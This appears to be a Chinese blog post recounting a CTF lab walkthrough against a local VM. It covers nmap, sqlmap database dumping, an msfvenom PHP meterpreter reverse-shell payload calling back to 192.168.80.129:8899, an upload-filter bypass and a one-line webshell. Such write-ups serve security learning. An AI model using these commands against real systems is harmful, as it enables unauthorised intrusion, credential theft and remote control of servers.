SQL注入-GET参数注入

CTF练习

第一次CTF练习

1.拿到虚拟机后开启
一开始想用外部Xshell连接它,被老冯骂了一顿

2.开启kali用nmap扫描该机器
nmap 192.168.80.135
发现该机器开启了22和80端口
说明该机器开启了ssh和http服务

3.浏览器查看该机器的http服务
http://192.168.80.135
发现网站,有四个页面,前三个是展示界面,第四个是登录界面
尝试登录

4.用burpsuite抓包
尝试进行用户名和密码爆破,失败
失败原因:密码字典不够强大(后面查看发现只有8位数字和六位密码,需要扩充自己的密码本)

5.用owasp扫描网站
发现SQL注入的漏洞,将url复制(后面的参数不用复制)

6.用sqlmap进行sql注入
sqlmap -u “复制的url”–dbs 查询数据库
-D “db_name”–tables 查询数据库db_name的所有表
-T “AA” --columns查询表AA的所有字段
-C “BB”–dump 查询BB列的数据
其中有好几个“y”,使用sqlmap的默认字典进行破解
成功。进入数据库,提取到用户名admin和密码p4ssw0rd
使用用户名和密码登录第四个界面
发现可以上传文件

7.使用msfvenom生成小马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.80.129 lport=8899 -f raw
默认端口是4444,不写端口的话后面监听的就是4444端口
raw就是直接生成语句,在终端直接显示,不用放到任何文件中
新建test.php文件并将语句粘贴进去,上传
网页显示:“NO PHP!”将后缀改为PHP,再次上传成功

8.开启msfconsole
使用payload:exploit/multi/handler监听129的8899端口得到回连的session
成功拿到shell

9.用一句话木马,上传一句话木马文件,使用菜刀连接后可对135上的文件进行增删改查

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值